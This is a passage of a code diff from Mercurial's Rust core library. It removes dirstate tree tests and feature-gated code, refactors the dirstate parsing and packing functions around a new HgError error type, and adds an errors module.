.to_vec() - .into_iter() - .collect() - })), - entry: removed_entry - }) - }) - ); - - assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some()) - } - - #[test] - fn test_insert_removed() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"foo/a"), removed_entry), - None - ); - // The insert should not turn `foo` into a directory as `foo` is not - // `Removed`. - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => panic!("should be a file"), - NodeKind::File(_) => {} - } - - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - // The insert *should* turn `foo` into a directory as it is `Removed`. - assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None); - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => {} - NodeKind::File(_) => panic!("should be a directory"), - } - } - - #[test] - fn test_get() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - assert_eq!(tree.get(HgPath::new(b"a/b")), None); - assert_eq!(tree.get(HgPath::new(b"a")), None); - assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None); - let entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - } - - #[test] - fn test_get_mut() { - let mut tree = Tree::new(); - let mut entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None); - let mut entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - } - - #[test] - fn test_remove() { - let mut tree = Tree::new(); - assert_eq!(tree.files_count, 0); - assert_eq!(tree.remove(HgPath::new(b"foo")), None); - assert_eq!(tree.files_count, 0); - - let entry = DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 0); - - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None); - assert_eq!(tree.files_count, 5); - - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry)); - assert_eq!(tree.files_count, 3); - assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry)); - assert_eq!(tree.files_count, 2); - - assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.remove(HgPath::new(b"y")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // `a` should have been cleaned up, no more files anywhere in its - // descendents - assert_eq!(tree.get_node(HgPath::new(b"a")), None); - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"a/b/x"), removed_entry), - None - ); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry)); - assert_eq!(tree.files_count, 0); - - dbg!(&tree); - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - assert_eq!(tree.insert(HgPath::new(b"d"), entry), None); - assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None); - assert_eq!(tree.files_count, 2); - - // Deleting the nested file should not delete the top directory as it - // used to be a file - assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert!(tree.get_node(HgPath::new(b"d")).is_some()); - assert!(tree.remove(HgPath::new(b"d")).is_some()); - assert_eq!(tree.files_count, 0); - - // Deleting the nested file should not delete the top file (other way - // around from the last case) - assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"a")).is_some()); - assert!(tree.get_node(HgPath::new(b"a/a")).is_none()); - } - - #[test] - fn test_was_directory() { - let mut tree = Tree::new(); - - let entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some()); - let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap(); - - match &new_a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - let dir = f.was_directory.clone().unwrap(); - let c = dir - .children - .get(&b"b".to_vec()) - .unwrap() - .children() - .unwrap() - .get(&b"c".to_vec()) - .unwrap(); - - assert_eq!( - match &c.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => f.entry, - }, - entry - ); - } - } - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - let a = tree.get_node(HgPath::new(b"a")).unwrap(); - match &a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - // Directory in `was_directory` was emptied, should be removed - assert_eq!(f.was_directory, None); - } - } - } - #[test] - fn test_extend() { - let insertions = [ - ( - HgPathBuf::from_bytes(b"d"), - DirstateEntry { - state: EntryState::Added, - mode: 0, - mtime: -1, - size: -1, - }, - ), - ( - HgPathBuf::from_bytes(b"b"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"d/d/d"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }, - ), - ] - .to_vec(); - let mut tree = Tree::new(); - - tree.extend(insertions.clone().into_iter()); - - for (path, _) in &insertions { - assert!(tree.contains_key(path), true); - } - assert_eq!(tree.files_count, 4); - } -} diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -3,15 +3,16 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ - dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError, + dirstate::{CopyMap, EntryState, RawEntry, StateMap}, + DirstateEntry, DirstateParents, }; -use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; +use byteorder::{BigEndian, WriteBytesExt}; +use bytes_cast::BytesCast; use micro_timer::timed; use std::convert::{TryFrom, TryInto}; -use std::io::Cursor; use std::time::Duration; /// Parents are stored in the dirstate as byte hashes. @@ -20,77 +21,64 @@ const MIN_ENTRY_SIZE: usize = 17; type ParseResult<'a> = ( - DirstateParents, + &'a DirstateParents, Vec<(&'a HgPath, DirstateEntry)>, Vec<(&'a HgPath, &'a HgPath)>, ); -#[timed] -pub fn parse_dirstate( +pub fn parse_dirstate_parents( contents: &[u8], -) -> Result<ParseResult, DirstateParseError> { - if contents.len() < PARENT_SIZE * 2 { - return Err(DirstateParseError::TooLittleData); - } - let mut copies = vec![]; - let mut entries = vec![]; +) -> Result<&DirstateParents, HgError> { + let (parents, _rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + Ok(parents) +} - let mut curr_pos = PARENT_SIZE * 2; - let parents = DirstateParents { - p1: contents[..PARENT_SIZE].try_into().unwrap(), - p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(), - }; +#[timed] +pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> { + let mut copies = Vec::new(); + let mut entries = Vec::new(); - while curr_pos < contents.len() { - if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(DirstateParseError::Overflow); - } - let entry_bytes = &contents[curr_pos..]; + let (parents, rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + contents = rest; + while !contents.is_empty() { + let (raw_entry, rest) = RawEntry::from_bytes(contents) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - let mut cursor = Cursor::new(entry_bytes); - let state = EntryState::try_from(cursor.read_u8()?)?; - let mode = cursor.read_i32::<BigEndian>()?; - let size = cursor.read_i32::<BigEndian>()?; - let mtime = cursor.read_i32::<BigEndian>()?; - let path_len = cursor.read_i32::<BigEndian>()? as usize; + let entry = DirstateEntry { + state: EntryState::try_from(raw_entry.state)?, + mode: raw_entry.mode.get(), + mtime: raw_entry.mtime.get(), + size: raw_entry.size.get(), + }; + let (paths, rest) = + u8::slice_from_bytes(rest, raw_entry.length.get() as usize) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - if path_len > contents.len() - curr_pos { - return Err(DirstateParseError::Overflow); + // `paths` is either a single path, or two paths separated by a NULL + // byte + let mut iter = paths.splitn(2, |&byte| byte == b'\0'); + let path = HgPath::new( + iter.next().expect("splitn always yields at least one item"), + ); + if let Some(copy_source) = iter.next() { + copies.push((path, HgPath::new(copy_source))); } - // Slice instead of allocating a Vec needed for `read_exact` - let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)]; - - let (path, copy) = match memchr::memchr(0, path) { - None => (path, None), - Some(i) => (&path[..i], Some(&path[(i + 1)..])), - }; - - if let Some(copy_path) = copy { - copies.push((HgPath::new(path), HgPath::new(copy_path))); - }; - entries.push(( - HgPath::new(path), - DirstateEntry { - state, - mode, - size, - mtime, - }, - )); - curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len); + entries.push((path, entry)); + contents = rest; } Ok((parents, entries, copies)) } /// `now` is the duration in seconds since the Unix epoch -#[cfg(not(feature = "dirstate-tree"))] pub fn pack_dirstate( state_map: &mut StateMap, copy_map: &CopyMap, parents: DirstateParents, now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { +) -> Result<Vec<u8>, HgError> { // TODO move away from i32 before 2038. let now: i32 = now.as_secs().try_into().expect("time overflow"); @@ -108,8 +96,8 @@ let mut packed = Vec::with_capacity(expected_size); - packed.extend(&parents.p1); - packed.extend(&parents.p2); + packed.extend(parents.p1.as_bytes()); + packed.extend(parents.p2.as_bytes()); for (filename, entry) in state_map.iter_mut() { let new_filename = filename.to_owned(); @@ -136,93 +124,27 @@ new_filename.extend(copy.bytes()); } - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; + // Unwrapping because `impl std::io::Write for Vec<u8>` never errors + packed.write_u8(entry.state.into()).unwrap(); + packed.write_i32::<BigEndian>(entry.mode).unwrap(); + packed.write_i32::<BigEndian>(entry.size).unwrap(); + packed.write_i32::<BigEndian>(new_mtime).unwrap(); + packed + .write_i32::<BigEndian>(new_filename.len() as i32) + .unwrap(); packed.extend(new_filename) } if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); + return Err(HgError::CorruptedRepository(format!( + "bad dirstate size: {} != {}", + expected_size, + packed.len() + ))); } Ok(packed) } -/// `now` is the duration in seconds since the Unix epoch -#[cfg(feature = "dirstate-tree")] -pub fn pack_dirstate( - state_map: &mut StateMap, - copy_map: &CopyMap, - parents: DirstateParents, - now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { - // TODO move away from i32 before 2038. - let now: i32 = now.as_secs().try_into().expect("time overflow"); - - let expected_size: usize = state_map - .iter() - .map(|(filename, _)| { - let mut length = MIN_ENTRY_SIZE + filename.len(); - if let Some(copy) = copy_map.get(&filename) { - length += copy.len() + 1; - } - length - }) - .sum(); - let expected_size = expected_size + PARENT_SIZE * 2; - - let mut packed = Vec::with_capacity(expected_size); - let mut new_state_map = vec![]; - - packed.extend(&parents.p1); - packed.extend(&parents.p2); - - for (filename, entry) in state_map.iter() { - let new_filename = filename.to_owned(); - let mut new_mtime: i32 = entry.mtime; - if entry.state == EntryState::Normal && entry.mtime == now { - // The file was last modified "simultaneously" with the current - // write to dirstate (i.e. within the same second for file- - // systems with a granularity of 1 sec). This commonly happens - // for at least a couple of files on 'update'. - // The user could change the file without changing its size - // within the same second. Invalidate the file's mtime in - // dirstate, forcing future 'status' calls to compare the - // contents of the file if the size is the same. This prevents - // mistakenly treating such files as clean. - new_mtime = -1; - new_state_map.push(( - filename.to_owned(), - DirstateEntry { - mtime: new_mtime, - ..entry - }, - )); - } - let mut new_filename = new_filename.into_vec(); - if let Some(copy) = copy_map.get(&filename) { - new_filename.push(b'\0'); - new_filename.extend(copy.bytes()); - } - - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; - packed.extend(new_filename) - } - - if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); - } - - state_map.extend(new_state_map); - - Ok(packed) -} #[cfg(test)] mod tests { @@ -235,8 +157,8 @@ let mut state_map = StateMap::default(); let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = b"1234567891011121314100000000000000000000".to_vec(); @@ -266,8 +188,8 @@ let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -306,8 +228,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -346,8 +268,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -366,7 +288,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -424,8 +346,8 @@ HgPathBuf::from_bytes(b"copyname2"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -444,7 +366,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -470,8 +392,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -491,7 +413,7 @@ assert_eq!( ( - parents, + &parents, [( HgPathBuf::from_bytes(b"f1"), DirstateEntry { diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -9,9 +9,6 @@ //! It is currently missing a lot of functionality compared to the Python one //! and will only be triggered in narrow cases. -#[cfg(feature = "dirstate-tree")] -use crate::dirstate::dirstate_tree::iter::StatusShortcut; -#[cfg(not(feature = "dirstate-tree"))] use crate::utils::path_auditor::PathAuditor; use crate::{ dirstate::SIZE_FROM_OTHER_PARENT, @@ -33,6 +30,7 @@ use std::{ borrow::Cow, collections::HashSet, + fmt, fs::{read_dir, DirEntry}, io::ErrorKind, ops::Deref, @@ -51,17 +49,16 @@ Unknown, } -impl ToString for BadType { - fn to_string(&self) -> String { - match self { +impl fmt::Display for BadType { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.write_str(match self { BadType::CharacterDevice => "character device", BadType::BlockDevice => "block device", BadType::FIFO => "fifo", BadType::Socket => "socket", BadType::Directory => "directory", BadType::Unknown => "unknown", - } - .to_string() + }) } } @@ -184,7 +181,13 @@ || other_parent || copy_map.contains_key(filename.as_ref()) { - Dispatch::Modified + if metadata.is_symlink() && size_changed { + // issue6456: Size returned may be longer due to encryption + // on EXT-4 fscrypt. TODO maybe only do it on EXT4? + Dispatch::Unsure + } else { + Dispatch::Modified + } } else if mod_compare(mtime, st_mtime as i32) || st_mtime == options.last_normal_time { @@ -265,7 +268,7 @@ pub traversed: Vec<HgPathBuf>, } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum StatusError { /// Generic IO error IO(std::io::Error), @@ -277,28 +280,12 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl From<PatternError> for StatusError { - fn from(e: PatternError) -> Self { - StatusError::Pattern(e) - } -} -impl From<HgPathError> for StatusError { - fn from(e: HgPathError) -> Self { - StatusError::Path(e) - } -} -impl From<std::io::Error> for StatusError { - fn from(e: std::io::Error) -> Self { - StatusError::IO(e) - } -} - -impl ToString for StatusError { - fn to_string(&self) -> String { +impl fmt::Display for StatusError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - StatusError::IO(e) => e.to_string(), - StatusError::Path(e) => e.to_string(), - StatusError::Pattern(e) => e.to_string(), + StatusError::IO(error) => error.fmt(f), + StatusError::Path(error) => error.fmt(f), + StatusError::Pattern(error) => error.fmt(f), } } } @@ -713,83 +700,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(feature = "dirstate-tree")] - #[timed] - pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend( - self.dmap - .fs_iter(self.root_dir.clone()) - .par_bridge() - .filter(|(path, _)| self.matcher.matches(path)) - .map(move |(filename, shortcut)| { - let entry = match shortcut { - StatusShortcut::Entry(e) => e, - StatusShortcut::Dispatch(d) => { - return (Cow::Owned(filename), d) - } - }; - let filename_as_path = match hg_path_to_path_buf(&filename) - { - Ok(f) => f, - Err(_) => { - return ( - Cow::Owned(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = self - .root_dir - .join(filename_as_path) - .symlink_metadata(); - - match meta { - Ok(m) - if !(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Ok(m) => { - let dispatch = dispatch_found( - &filename, - entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ); - (Cow::Owned(filename), dispatch) - } - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => { - (Cow::Owned(filename), dispatch_os_error(&e)) - } - } - }), - ); - } - - /// Add the files in the dirstate to the results. - /// - /// This takes a mutable reference to the results to account for the - /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { results.par_extend( @@ -860,7 +770,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) { let to_visit: Vec<(&HgPath, &DirstateEntry)> = diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/errors.rs @@ -0,0 +1,183 @@ +use crate::config::ConfigValueParseError; +use std::fmt; + +/// Common error cases that can happen in many different APIs +#[derive(Debug, derive_more::From)] +pub enum HgError { + IoError { + error: std::io::Error, + context: IoErrorContext, + }, + + /// A file under `.hg/` normally only written by Mercurial is not in the + /// expected format. This indicates a bug in Mercurial, filesystem + /// corruption, or hardware failure. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + CorruptedRepository(String), + + /// The respository or requested operation involves a feature not + /// supported by the Rust implementation. Falling back to the Python + /// implementation may or may not work. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + UnsupportedFeature(String), + + /// Operation cannot proceed for some other reason. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + Abort(String), + + /// A configuration value is not in the expected syntax. + /// + /// These errors can happen in many places in the code because values are + /// parsed lazily as the file-level parser does not know the expected type + /// and syntax of each value. + #[from] + ConfigValueParseError(ConfigValueParseError), +} + +/// Details about where an I/O error happened +#[derive(Debug)] +pub enum IoErrorContext { + ReadingFile(std::path::PathBuf), + WritingFile(std::path::PathBuf), + RemovingFile(std::path::PathBuf), + RenamingFile { + from: std::path::PathBuf, + to: std::path::PathBuf, + }, + /// `std::fs::canonicalize` + CanonicalizingPath(std::path::PathBuf), + /// `std::env::current_dir` + CurrentDir, + /// `std::env::current_exe` + CurrentExe, +} + +impl HgError { + pub fn corrupted(explanation: impl Into<String>) -> Self { + // TODO: capture a backtrace here and keep it in the error value + // to aid debugging? + // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html + HgError::CorruptedRepository(explanation.into()) + } + + pub fn unsupported(explanation: impl Into<String>) -> Self { + HgError::UnsupportedFeature(explanation.into()) + } + pub fn abort(explanation: impl Into<String>) -> Self { + HgError::Abort(explanation.into()) + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for HgError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + HgError::Abort(explanation) => write!(f, "{}", explanation), + HgError::IoError { error, context } => { + write!(f, "abort: {}: {}", context, error) + } + HgError::CorruptedRepository(explanation) => { + write!(f, "abort: {}", explanation) + } + HgError::UnsupportedFeature(explanation) => { + write!(f, "unsupported feature: {}", explanation) + } + HgError::ConfigValueParseError(error) => error.fmt(f), + } + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for IoErrorContext { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + IoErrorContext::ReadingFile(path) => { + write!(f, "when reading {}", path.display()) + } + IoErrorContext::WritingFile(path) => { + write!(f, "when writing {}", path.display()) + } + IoErrorContext::RemovingFile(path) => { + write!(f, "when removing {}", path.display()) + } + IoErrorContext::RenamingFile { from, to } => write!( + f, + "when renaming {} to {}", + from.display(), + to.display() + ), + IoErrorContext::CanonicalizingPath(path) => { + write!(f, "when canonicalizing {}", path.display()) + } + IoErrorContext::CurrentDir => { + write!(f, "error getting current working directory") + } + IoErrorContext::CurrentExe => { + write!(f, "error getting current executable") + } + } + } +} + +pub trait IoResultExt<T> { + /// Annotate a possible I/O error as related to a reading a file at the + /// given path. + /// + /// This allows printing something like “File not found when reading + /// example.txt” instead of just “File not found”. + /// + /// Converts a `Result` with `std::io::Error` into one with `HgError`. + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>; + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError>; +} + +impl<T> IoResultExt<T> for std::io::Result<T> { + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.with_context(|| IoErrorContext::ReadingFile(path.to_owned())) + } + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError> { + self.map_err(|error| HgError::IoError { + error, + context: context(), + }) + } +} + +pub trait HgResultExt<T> { + /// Handle missing files separately from other I/O error cases. + /// + /// Wraps the `Ok` type in an `Option`: + /// + /// * `Ok(x)` becomes `Ok(Some(x))` + /// * An I/O "not found" error becomes `Ok(None)` + /// * Other errors are unchanged + fn io_not_found_as_none(self) -> Result<Option<T>, HgError>; +} + +impl<T> HgResultExt<T> for Result<T, HgError> { + fn io_not_found_as_none(self) -> Result<Option<T>, HgError> { + match self { + Ok(x) => Ok(Some(x)), + Err(HgError::IoError { error, .. }) + if error.kind() == std::io::ErrorKind::NotFound => + { + Ok(None) + } + Err(other_error) => Err(other_error), + } + } +} diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -3,8 +3,10 @@ // // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. + mod ancestors; pub mod dagops; +pub mod errors; pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors}; mod dirstate; pub mod discovery; @@ -15,7 +17,8 @@ dirstate_map::DirstateMap, parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE}, status::{ - status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions, + status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError, + StatusOptions, }, CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState, StateMap, StateMapIter, @@ -27,23 +30,18 @@ pub mod revlog; pub use revlog::*; pub mod config; +pub mod logging; pub mod operations; +pub mod revset; pub mod utils; -// Remove this to see (potential) non-artificial compile failures. MacOS -// *should* compile, but fail to compile tests for example as of 2020-03-06 -#[cfg(not(target_os = "linux"))] -compile_error!( - "`hg-core` has only been tested on Linux and will most \ - likely not behave correctly on other platforms." -); - use crate::utils::hg_path::{HgPathBuf, HgPathError}; pub use filepatterns::{ parse_pattern_syntax, read_pattern_file, IgnorePattern, PatternFileWarning, PatternSyntax, }; use std::collections::HashMap; +use std::fmt; use twox_hash::RandomXxHashBuilder64; /// This is a contract between the `micro-timer` crate and us, to expose @@ -57,45 +55,6 @@ /// write access to your repository, you have other issues. pub type FastHashMap<K, V> = 